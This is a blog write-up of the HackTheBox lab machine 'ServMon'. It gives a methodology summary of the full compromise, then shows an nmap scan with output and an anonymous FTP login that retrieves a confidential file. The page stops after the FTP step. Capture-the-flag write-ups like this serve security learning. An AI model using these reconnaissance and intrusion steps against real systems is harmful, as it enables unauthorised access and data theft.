<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="Quick Summary   →   Penetration Testing Methodologies Network Scanning → Nmap scan → discover open ports and what services are running  Enumeration → Service enumeration → ftp is available so I digg">
<meta property="og:type" content="article">
<meta property="og:title" content="HackTheBox - ServMon">
<meta property="og:url" content="https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/index.html">
<meta property="og:site_name" content="❯ PΛYΛƧ0">
<meta property="og:description" content="Quick Summary   →   Penetration Testing Methodologies Network Scanning → Nmap scan → discover open ports and what services are running  Enumeration → Service enumeration → ftp is available so I digg">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://ph-payas0.github.io/img/servmon/servmon-box.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/servmon/nvms-1000-exploit.png">
<meta property="og:image" content="https://www.exploit-db.com/images/spider-orange.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/servmon/servmon-nvms-1000.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/servmon/servmon-burp.png">
<meta property="og:image" content="https://www.hackthebox.eu/badge/image/128965">
<meta property="article:published_time" content="2020-06-18T02:21:03.000Z">
<meta property="article:modified_time" content="2020-07-04T03:52:20.742Z">
<meta property="article:author" content="medz">
<meta property="article:tag" content="windows">
<meta property="article:tag" content="retired">
<meta property="article:tag" content="ftp">
<meta property="article:tag" content="nvms-1000">
<meta property="article:tag" content="nsclient++">
<meta property="article:tag" content="traversal">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ph-payas0.github.io/img/servmon/servmon-box.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon-1.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/android-chrome-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>HackTheBox - ServMon</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="❯ PΛYΛƧ0" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/projects/">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" href="/2020-06-04/HackTheBox-Nest/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&text=HackTheBox - ServMon" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&title=HackTheBox - ServMon" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&is_video=false&description=HackTheBox - ServMon" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HackTheBox - ServMon&body=Check out this article: https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&title=HackTheBox - ServMon" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&title=HackTheBox - ServMon" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&title=HackTheBox - ServMon" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&title=HackTheBox - ServMon" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&name=HackTheBox - ServMon&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&t=HackTheBox - ServMon" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Quick-Summary"><span class="toc-number">1.</span> <span class="toc-text">Quick Summary</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Penetration-Testing-Methodologies"><span class="toc-number">2.</span> <span class="toc-text">Penetration Testing Methodologies</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Network-Scanning"><span class="toc-number">3.</span> <span class="toc-text">Network Scanning</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Walkthrough"><span class="toc-number">3.1.</span> <span class="toc-text">Walkthrough</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Nmap-Results"><span class="toc-number">3.2.</span> <span class="toc-text">Nmap Results</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Enumeration"><span class="toc-number">4.</span> <span class="toc-text">Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Checking-the-FTP-Service"><span class="toc-number">4.1.</span> <span class="toc-text">Checking the FTP Service</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Post-Exploitation"><span class="toc-number">5.</span> <span class="toc-text">Post Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Checking-the-Web-client"><span class="toc-number">5.1.</span> <span class="toc-text">Checking the Web client</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Directory-Traversal"><span class="toc-number">5.2.</span> <span class="toc-text">Directory Traversal</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploitation"><span class="toc-number">6.</span> <span class="toc-text">Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Brute-forcing-the-SSH"><span class="toc-number">6.1.</span> <span class="toc-text">Brute forcing the SSH</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Get-user-txt"><span class="toc-number">6.2.</span> <span class="toc-text">Get user.txt</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Privilege-Escalation"><span class="toc-number">7.</span> <span class="toc-text">Privilege Escalation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Enumerating-directories"><span class="toc-number">7.1.</span> <span class="toc-text">Enumerating directories</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Grab-administrator-password"><span class="toc-number">7.2.</span> <span class="toc-text">Grab administrator password</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#NSClient-Web-Server"><span class="toc-number">7.3.</span> <span class="toc-text">NSClient++ Web Server</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Grab-root-flag"><span class="toc-number">7.4.</span> <span class="toc-text">Grab root flag</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
        <div class="content index py4">
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        HackTheBox - ServMon
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">❯ PΛYΛƧ0</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-06-18T02:21:03.000Z" itemprop="datePublished">18-06-2020</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/HackTheBox/">HackTheBox</a> › <a class="category-link" href="/categories/HackTheBox/PenTesting/">PenTesting</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/ftp/" rel="tag">ftp</a>, <a class="tag-link" href="/tags/nsclient/" rel="tag">nsclient++</a>, <a class="tag-link" href="/tags/nvms-1000/" rel="tag">nvms-1000</a>, <a class="tag-link" href="/tags/retired/" rel="tag">retired</a>, <a class="tag-link" href="/tags/traversal/" rel="tag">traversal</a>, <a class="tag-link" href="/tags/windows/" rel="tag">windows</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p><img src="/img/servmon/servmon-box.png" alt="HackTheBox-ServMon" title="ServMon"></p>
<hr>
<h2 id="Quick-Summary"><a href="#Quick-Summary" class="headerlink" title="Quick Summary"></a>Quick Summary</h2><p>   → </p>
<hr>
<h2 id="Penetration-Testing-Methodologies"><a href="#Penetration-Testing-Methodologies" class="headerlink" title="Penetration Testing Methodologies"></a>Penetration Testing Methodologies</h2><ol>
<li><p><strong>Network Scanning</strong></p>
<p>→ Nmap scan</p>
<p>→ discover open ports and what services are running</p>
</li>
<li><p><strong>Enumeration</strong></p>
<p>→ Service enumeration</p>
<p>→ <code>ftp</code> is available so I digging it</p>
<p>→ got the <code>confidential.txt</code></p>
</li>
<li><p><strong>Post - Exploitation</strong></p>
<p>→ Login to web page with <code>credentials</code> we got.</p>
<p>→ <code>NVMS-1000</code> was vulnerable to <code>directory-traversal</code></p>
<p>→ enumerate machine with <code>directory-traversal</code> vulnerabilty</p>
<p>→ Found the <code>password.txt</code> file on a desktop</p>
</li>
<li><p><strong>Exploitation</strong></p>
<p>→ collect the all the <code>password</code></p>
<p>→ use it bruteforce user using <code>Hydra</code></p>
<p>→ finally I got the right password and login it into ssh and get <code>user.txt</code></p>
</li>
<li><p><strong>Privilege Escalation</strong></p>
<p>→ start enumerating directories</p>
<p>→ found the <code>NSClient++</code> folder</p>
<p>→ after searching it on <code>google</code> there was vulnerability in <code>NSClient++</code> where the low privilege can ability to read the web administator’s password in cleartext from the configuration file.</p>
<p>→ due to high load of network traffic in the web page’ it is so slow to load so I try <code>cURL</code> to get <code>root</code></p>
<p>→ try to put <code>nc.exe</code> using <code>SMB Server</code></p>
<p>→ load the binary and execute</p>
<p>→ Finally we get the <code>root</code></p>
</li>
</ol>
<hr>
<h2 id="Network-Scanning"><a href="#Network-Scanning" class="headerlink" title="Network Scanning"></a>Network Scanning</h2><h3 id="Walkthrough"><a href="#Walkthrough" class="headerlink" title="Walkthrough"></a>Walkthrough</h3><p>→ I always begin at <strong><em>NMAP</em></strong> to look on the services what is running. I always use</p>
<hr>
<ul>
<li>-sV      ⇒ Probe open ports to determine service/version info</li>
<li>-sC      ⇒ equivalent to —script=default</li>
<li>-A-      ⇒ Agressive scan</li>
<li>-oN      ⇒ to save our scan results to a text file</li>
</ul>
<hr>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">nmap -sV -sC -A 10.10.10.184 -oN nmap-ServMon</span><br></pre></td></tr></table></figure>

<hr>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># bash</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/ServMon </span><br><span class="line">❯ nmap -sV -sC -A <span class="number">10.10</span><span class="number">.10</span><span class="number">.184</span> -oN nmap-ServMon</span><br><span class="line">Starting Nmap <span class="number">7.80</span> ( https:<span class="comment">//nmap.org ) at 2020-04-14 08:08 PST</span></span><br><span class="line">Nmap scan report <span class="keyword">for</span> <span class="number">10.10</span><span class="number">.10</span><span class="number">.184</span></span><br><span class="line"><span class="function">Host <span class="keyword">is</span> <span class="title">up</span> (<span class="params"><span class="number">0.25</span>s latency</span>).</span></span><br><span class="line"><span class="function">Not shown: 991 closed ports</span></span><br><span class="line"><span class="function">PORT     STATE SERVICE       VERSION</span></span><br><span class="line"><span class="function">21/tcp   open  ftp           Microsoft ftpd</span></span><br><span class="line"><span class="function">| ftp-anon: Anonymous FTP login <span class="title">allowed</span> (<span class="params">FTP code <span class="number">230</span></span>)</span></span><br><span class="line"><span class="function">|_01-18-20  12:05PM       &lt;DIR&gt;          Users</span></span><br><span class="line"><span class="function">| ftp-syst: </span></span><br><span class="line"><span class="function">|_  SYST: Windows_NT</span></span><br><span class="line"><span class="function">22/tcp   open  ssh           OpenSSH for_Windows_7.7 (<span class="params">protocol <span class="number">2.0</span></span>)</span></span><br><span class="line"><span class="function">| ssh-hostkey: </span></span><br><span class="line"><span class="function">|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (<span class="params">RSA</span>)</span></span><br><span class="line"><span class="function">|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (<span class="params">ECDSA</span>)</span></span><br><span class="line"><span class="function">|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0<span class="title">e</span> (<span class="params">ED25519</span>)</span></span><br><span class="line"><span class="function">80/tcp   open  http</span></span><br><span class="line"><span class="function">| fingerprint-strings: </span></span><br><span class="line"><span class="function">|   FourOhFourRequest: </span></span><br><span class="line"><span class="function">|     HTTP/1.1 404 Not Found</span></span><br><span class="line"><span class="function">|     Content-type: text/html</span></span><br><span class="line"><span class="function">|     Content-Length: 0</span></span><br><span class="line"><span class="function">|     Connection: close</span></span><br><span class="line"><span class="function">|     AuthInfo:</span></span><br><span class="line"><span class="function">|   GetRequest, HTTPOptions, RTSPRequest: </span></span><br><span class="line"><span class="function">|     HTTP/1.1 200 OK</span></span><br><span class="line"><span class="function">|     Content-type: text/html</span></span><br><span class="line"><span class="function">|     Content-Length: 340</span></span><br><span class="line"><span class="function">|     Connection: close</span></span><br><span class="line"><span class="function">|     AuthInfo: </span></span><br><span class="line"><span class="function">|     &lt;!DOCTYPE html PUBLIC "-<span class="comment">//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;</span></span></span><br><span class="line"><span class="function">|     &lt;html xmlns</span>=<span class="string">"http://www.w3.org/1999/xhtml"</span>&gt;</span><br><span class="line">|     &lt;head&gt;</span><br><span class="line">|     &lt;title&gt;&lt;/title&gt;</span><br><span class="line">|     &lt;script type=<span class="string">"text/javascript"</span>&gt;</span><br><span class="line">|     window.location.href = <span class="string">"Pages/login.htm"</span>;</span><br><span class="line">|     &lt;/script&gt;</span><br><span class="line">|     &lt;/head&gt;</span><br><span class="line">|     &lt;body&gt;</span><br><span class="line">|     &lt;/body&gt;</span><br><span class="line">|_    &lt;/html&gt;</span><br><span class="line">|_http-title: Site doesn<span class="string">'t have a title (text/html).</span></span><br><span class="line"><span class="string">135/tcp  open  msrpc         Microsoft Windows RPC</span></span><br><span class="line"><span class="string">139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn</span></span><br><span class="line"><span class="string">445/tcp  open  microsoft-ds?</span></span><br><span class="line"><span class="string">5666/tcp open  nrpe?</span></span><br><span class="line"><span class="string">6699/tcp open  napster?</span></span><br><span class="line"><span class="string">8443/tcp open  tcpwrapped</span></span><br><span class="line"><span class="string">| http-title: NSClient++</span></span><br><span class="line"><span class="string">|_Requested resource was /index.html</span></span><br><span class="line"><span class="string">| ssl-cert: Subject: commonName=localhost</span></span><br><span class="line"><span class="string">| Not valid before: 2020-01-14T13:24:20</span></span><br><span class="line"><span class="string">|_Not valid after:  2021-01-13T13:24:20</span></span><br><span class="line"><span class="string">|_ssl-date: TLS randomness does not represent time</span></span><br><span class="line"><span class="string">1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :</span></span><br><span class="line"><span class="string">SF-Port80-TCP:V=7.80%I=7%D=4/14%Time=5E94FF5F%P=x86_64-pc-linux-gnu%r(GetR</span></span><br><span class="line"><span class="string">SF:equest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nCon</span></span><br><span class="line"><span class="string">SF:tent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xe</span></span><br><span class="line"><span class="string">SF:f\xbb\xbf&lt;!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\</span></span><br><span class="line"><span class="string">SF:x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-tra</span></span><br><span class="line"><span class="string">SF:nsitional\.dtd\"&gt;\r\n\r\n&lt;html\x20xmlns=\"http://www\.w3\.org/1999/xhtm</span></span><br><span class="line"><span class="string">SF:l\"&gt;\r\n&lt;head&gt;\r\n\x20\x20\x20\x20&lt;title&gt;&lt;/title&gt;\r\n\x20\x20\x20\x20&lt;s</span></span><br><span class="line"><span class="string">SF:cript\x20type=\"text/javascript\"&gt;\r\n\x20\x20\x20\x20\x20\x20\x20\x20w</span></span><br><span class="line"><span class="string">SF:indow\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</span></span><br><span class="line"><span class="string">SF:&lt;/script&gt;\r\n&lt;/head&gt;\r\n&lt;body&gt;\r\n&lt;/body&gt;\r\n&lt;/html&gt;\r\n")%r(HTTPOption</span></span><br><span class="line"><span class="string">SF:s,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent-</span></span><br><span class="line"><span class="string">SF:Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb</span></span><br><span class="line"><span class="string">SF:\xbf&lt;!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Tr</span></span><br><span class="line"><span class="string">SF:ansitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transiti</span></span><br><span class="line"><span class="string">SF:onal\.dtd\"&gt;\r\n\r\n&lt;html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\"&gt;\</span></span><br><span class="line"><span class="string">SF:r\n&lt;head&gt;\r\n\x20\x20\x20\x20&lt;title&gt;&lt;/title&gt;\r\n\x20\x20\x20\x20&lt;script</span></span><br><span class="line"><span class="string">SF:\x20type=\"text/javascript\"&gt;\r\n\x20\x20\x20\x20\x20\x20\x20\x20window</span></span><br><span class="line"><span class="string">SF:\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20&lt;/scr</span></span><br><span class="line"><span class="string">SF:ipt&gt;\r\n&lt;/head&gt;\r\n&lt;body&gt;\r\n&lt;/body&gt;\r\n&lt;/html&gt;\r\n")%r(RTSPRequest,1B4</span></span><br><span class="line"><span class="string">SF:,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent-Lengt</span></span><br><span class="line"><span class="string">SF:h:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb\xbf&lt;</span></span><br><span class="line"><span class="string">SF:!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Transit</span></span><br><span class="line"><span class="string">SF:ional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transitional\</span></span><br><span class="line"><span class="string">SF:.dtd\"&gt;\r\n\r\n&lt;html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\"&gt;\r\n&lt;h</span></span><br><span class="line"><span class="string">SF:ead&gt;\r\n\x20\x20\x20\x20&lt;title&gt;&lt;/title&gt;\r\n\x20\x20\x20\x20&lt;script\x20t</span></span><br><span class="line"><span class="string">SF:ype=\"text/javascript\"&gt;\r\n\x20\x20\x20\x20\x20\x20\x20\x20window\.loc</span></span><br><span class="line"><span class="string">SF:ation\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20&lt;/script&gt;\</span></span><br><span class="line"><span class="string">SF:r\n&lt;/head&gt;\r\n&lt;body&gt;\r\n&lt;/body&gt;\r\n&lt;/html&gt;\r\n")%r(FourOhFourRequest,65</span></span><br><span class="line"><span class="string">SF:,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-type:\x20text/html\r\nCon</span></span><br><span class="line"><span class="string">SF:tent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n");</span></span><br><span class="line"><span class="string">No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).</span></span><br><span class="line"><span class="string">TCP/IP fingerprint:</span></span><br><span class="line"><span class="string">OS:SCAN(V=7.80%E=4%D=4/14%OT=21%CT=1%CU=44262%PV=Y%DS=2%DC=T%G=Y%TM=5E95004</span></span><br><span class="line"><span class="string">OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=106%TI=I%CI=I%TS=U)SEQ(SP=F</span></span><br><span class="line"><span class="string">OS:C%GCD=1%ISR=FC%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%</span></span><br><span class="line"><span class="string">OS:O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3</span></span><br><span class="line"><span class="string">OS:=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N</span></span><br><span class="line"><span class="string">OS:%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%</span></span><br><span class="line"><span class="string">OS:F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y</span></span><br><span class="line"><span class="string">OS:%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%R</span></span><br><span class="line"><span class="string">OS:D=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%</span></span><br><span class="line"><span class="string">OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPC</span></span><br><span class="line"><span class="string">OS:K=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Network Distance: 2 hops</span></span><br><span class="line"><span class="string">Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Host script results:</span></span><br><span class="line"><span class="string">|_clock-skew: 2m57s</span></span><br><span class="line"><span class="string">| smb2-security-mode: </span></span><br><span class="line"><span class="string">|   2.02: </span></span><br><span class="line"><span class="string">|_    Message signing enabled but not required</span></span><br><span class="line"><span class="string">| smb2-time: </span></span><br><span class="line"><span class="string">|   date: 2020-04-14T00:16:09</span></span><br><span class="line"><span class="string">|_  start_date: N/A</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">TRACEROUTE (using port 993/tcp)</span></span><br><span class="line"><span class="string">HOP RTT       ADDRESS</span></span><br><span class="line"><span class="string">1   257.80 ms 10.10.14.1</span></span><br><span class="line"><span class="string">2   257.93 ms 10.10.10.184</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span></span><br><span class="line"><span class="string">Nmap done: 1 IP address (1 host up) scanned in 317.59 seconds</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">root in htb/boxes/ServMon took 5m17s </span></span><br><span class="line"><span class="string">❯</span></span><br></pre></td></tr></table></figure>

<hr>
<h3 id="Nmap-Results"><a href="#Nmap-Results" class="headerlink" title="Nmap Results"></a>Nmap Results</h3><p>So there’s a lot of ports open but let’s which was the most interesting. Checking that 1 by 1 takes a lot of time</p>
<hr>
<h2 id="Enumeration"><a href="#Enumeration" class="headerlink" title="Enumeration"></a>Enumeration</h2><h3 id="Checking-the-FTP-Service"><a href="#Checking-the-FTP-Service" class="headerlink" title="Checking the FTP Service"></a>Checking the FTP Service</h3><p>Since there was an <code>ftp</code> let’s check it if we can access it anonymously :</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/ServMon </span><br><span class="line">❯ ftp 10.10.10.184</span><br><span class="line">Connected to 10.10.10.184.</span><br><span class="line">220 Microsoft FTP Service</span><br><span class="line">Name (10.10.10.184:root): anonymous</span><br><span class="line">331 Anonymous access allowed, send identity (e-mail name) as password.</span><br><span class="line">Password:</span><br><span class="line">230 User logged <span class="keyword">in</span>.</span><br><span class="line">Remote system <span class="built_in">type</span> is Windows_NT.</span><br><span class="line">ftp&gt; dir</span><br><span class="line">200 PORT <span class="built_in">command</span> successful.</span><br><span class="line">125 Data connection already open; Transfer starting.</span><br><span class="line">01-18-20  12:05PM       &lt;DIR&gt;          Users</span><br><span class="line">226 Transfer complete.</span><br><span class="line">ftp&gt; <span class="built_in">cd</span> Users</span><br><span class="line">250 CWD <span class="built_in">command</span> successful.</span><br><span class="line">ftp&gt; dir</span><br><span class="line">200 PORT <span class="built_in">command</span> successful.</span><br><span class="line">125 Data connection already open; Transfer starting.</span><br><span class="line">01-18-20  12:06PM       &lt;DIR&gt;          Nadine</span><br><span class="line">01-18-20  12:08PM       &lt;DIR&gt;          Nathan</span><br><span class="line">226 Transfer complete.</span><br><span class="line">ftp&gt;</span><br></pre></td></tr></table></figure>

<p>Inside the <code>ftp</code> file we got to users – <strong><code>Nadine</code></strong> &amp; <strong><code>Nathan</code></strong> let’s check first Nadine’s directory and transfer it to my Kali machine.</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">ftp&gt; <span class="built_in">cd</span> Nadine</span><br><span class="line">250 CWD <span class="built_in">command</span> successful.</span><br><span class="line">ftp&gt; dir</span><br><span class="line">200 PORT <span class="built_in">command</span> successful.</span><br><span class="line">125 Data connection already open; Transfer starting.</span><br><span class="line">01-18-20  12:08PM                  174 Confidential.txt</span><br><span class="line">226 Transfer complete.</span><br><span class="line">ftp&gt; get Confidential.txt</span><br><span class="line"><span class="built_in">local</span>: Confidential.txt remote: Confidential.txt</span><br><span class="line">200 PORT <span class="built_in">command</span> successful.</span><br><span class="line">125 Data connection already open; Transfer starting.</span><br><span class="line">226 Transfer complete.</span><br><span class="line">174 bytes received <span class="keyword">in</span> 6.29 secs (0.0270 kB/s)</span><br><span class="line">ftp&gt;</span><br></pre></td></tr></table></figure>

